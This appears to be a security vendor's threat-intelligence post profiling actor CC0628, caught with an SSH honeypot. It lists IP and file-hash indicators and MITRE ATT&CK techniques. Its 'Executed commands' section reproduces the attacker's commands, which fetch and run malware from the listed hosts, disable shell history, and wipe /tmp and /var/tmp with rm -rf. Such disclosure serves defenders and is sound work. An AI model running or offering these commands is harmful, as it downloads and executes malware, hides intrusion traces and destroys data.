Over the past year, our team has been working at gathering intel on new and unusual threat actors to augment the capabilities of our platform. Using our deception technology, we have detected several new threat actors in the wild, some of which we will be sharing weekly, right here. This is the first in a series of posts in which we will describe the IOCs and TTPs of different threat actors we have uncovered, so be sure to check back or follow us on LinkedIn for updates.
By locating a decoy machine in a U.S. web server of a well-known provider, with an ssh port open to the outside network, we have found many attackers that approach the machine and try to access it, oftentimes with sheer brute force. By giving the machine a deliberately weak username and password, we were able to allow attackers an easy way in, after which we could observe their behaviors and TTPs. This relevant and timely threat intelligence allows us to update threat actor intel for our platform, so that all of our clients can benefit from the knowledge. This information can also be shared with red and blue teams so they know what malwares and attackers are compromising machines.
Read on about the first of many threat actors we’re tracking: CC0628.
CC0628
Suspected attribution: Unknown
Risk: Medium
Target sectors: Any host.
Overview: The goal of CC0628 is to scan the Internet searching for vulnerabilities using a compromised machine to not be reported.
Associated malware: SSHD, MIZAKOTROPISTA86, MIZAKOTROPISTAPS, MIZAKOTROPISTSL, MIZAKOTROPISTAM4, MIZAKOTROPISTAM5, MIZAKOTROPISTAM6, MIZAKOTROPISTAM7, MIZAKOTROPISTAPC, MIZAKOTROPISTA8K, MIZAKOTROPISTAX64 CRATON.PL, ULIMIT.SH
IOCs:
| IP |
|---|
| 192.99.43.212 |
| 144.217.249.55 |
| Filename | Filepath | SHA-256 |
|---|---|---|
| sshd | /tmp/sshd | 97e86c34cd0b678e12edcabf40b16e6c274815f591905eb9e6ec2c97ab9b5f58 |
| mizakotropista86 | /tmp/mizakotropista86 | 50fa1f2735f018b22c86fc6ce546a8c6b9ca730e78d23f5a986f787191398c37 |
| mizakotropistaps | /tmp/mizakotropistaps | 0619b86b6707c97febaae11d75f783ec4b32e88f83f5d55761a0d04f92bea42e |
| mizakotropistasl | /tmp/mizakotropistasl | 0e722a9c17bebf1a84754e4cef108a38cde9763749596d5a4672697ab68eaf67 |
| mizakotropistam4 | /tmp/mizakotropistam4 | 5b1ca59a8e0e9583c4102605264fc29a0cfab84c68b78072a908a5783b441948 |
| mizakotropistam5 | /tmp/mizakotropistam5 | 110ddecda3ce0bd41206fe557550754b4fb21bcd663201253d57f9c291764440 |
| mizakotropistam6 | /tmp/mizakotropistam6 | 447e208fa47057567e828912b23a0927b0c74220e7336e2243ff1541b353157e |
| mizakotropistam7 | /tmp/mizakotropistam7 | f89bb5668bb6b8c46e837e8219e07303b94305bae6faa298ea21feea2b02cd3d |
| mizakotropistapc | /tmp/mizakotropistapc | e762e34fb86167d139a61ecbcc6dfb768ee4cfb7955469ff9fda6e444a60af75 |
| mizakotropista8k | /tmp/mizakotropista8k | 3c128d01635bf9a9b5d3d90ef4a56212554f7a44c579a74aff707455847eb515 |
| mizakotropistax64 | /tmp/mizakotropistax64 | 5d6f674a7abab5e60548531a69e6ecb23cc2e2fe823cd7f8ccac6928db5f757e |
| bash.sh | /tmp/bash.sh | a5e010b0abf603facae5676c2c37f7063f6efc12bc7c863982bff133ec547a3f |
| craton.pl | /tmp/craton.pl | 7046260a23088b52debdeb701032db0352323ed26d9816daa4a53222b26ca720 |
Attack vectors:
CC0628 uses brute force attacks as its initial compromise method.
Once they obtain a valid authentication, they download and execute a script called sshd where they start downloading and executing different files such as MELITACAFE, MIZAKOTROPISTA86 and CRATON.PL. All these files have the same content but are compiled for different systems.
Finally, they started scanning the Internet for vulnerabilities and they sent all scanned IPs to their server.
MITRE ATT&CK Techniques
Cataloguing the threat actor’s TTPs with MITRE ATT&CK’s matrix can help teams mitigate risk and stop attacks. These are the MITRE ATT&CK techniques that we observed in CC0628’s behavior:
MITRE ATT&CK PIC WITH MATCHED TTPs
Command and Scripting Interpreter – Unix Shell (T1059.004): attackers abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh…) depending on the specific distribution.
Network Service Scanning (T1046): attackers attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.
Indicator Removal on Host – File Deletion (T1070.004): attackers delete files left behind by the actions of their intrusion activity. Malware, tools. Or other non-native files dropped or created on a system by an adversary may leave traces to indicate what was done within a network and how.
Executed commands:
wget 192.99.43.212/sshd -O /tmp/sshd; curl -O 192.99.43.212/sshd -o /tmp/sshd; chmod 777 /tmp/sshd; sh /tmp/sshd; rm -rf /tmp/sshd /tmp/sshd.1; rm -rf *
rm -rf /tmp/mizakotropista*
rm -rf /tmp/melitacafe*
rm -rf mizakotropista*
rm -rf melitacafe*
unset HISTFILE; unset SAVEHIST
echo "unset HISTFILE; unset SAVEHIST" >> ~/.bashrc
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista86; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropista86;cat mizakotropista86 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistaps; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistaps;cat mizakotropistaps >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistasl; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistasl;cat mizakotropistasl >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam4; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam4;cat mizakotropistam4 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam5; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam5;cat mizakotropistam5 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam6; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam6;cat mizakotropistam6 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistam7; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistam7;cat mizakotropistam7 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistapc; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistapc;cat mizakotropistapc >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropista8k; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropista8k;cat mizakotropista8k >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistah4; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistah4;cat mizakotropistah4 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/54545asd5asd45as45/mizakotropistax64; curl -O http://192.99.43.212/54545asd5asd45as45/mizakotropistax64;cat mizakotropistax64 >melitacafe;chmod +x *;nice -20 ./melitacafe machine
cd /tmp; wget http://192.99.43.212/bash.sh; curl http://192.99.43.212/bash.sh -o bash.sh; chmod 777 bash.sh; nohup bash bash.sh &
cd /tmp; wget http://192.99.43.212/craton.pl -O /tmp/craton.pl; curl http://192.99.43.212/craton.pl -o /tmp/craton.pl; chmod 777 /tmp/craton.pl; perl /tmp/craton.pl; rm -rf /tmp/craton.pl; rm -rf /tmp/craton.pl.*
cd /tmp; curl 144.217.249.55/initd -o /tmp/initd; wget 144.217.249.55/initd -O /tmp/initd; chmod 777 /tmp/initd; sh /tmp/initd; rm -rf /tmp/initd; rm -rf /tmp/initd.1
rm -rf /tmp/*
rm -rf /var/tmp/*
Follow these links to read about the other threat actors we’ve uncovered using our deception-powered threat intel: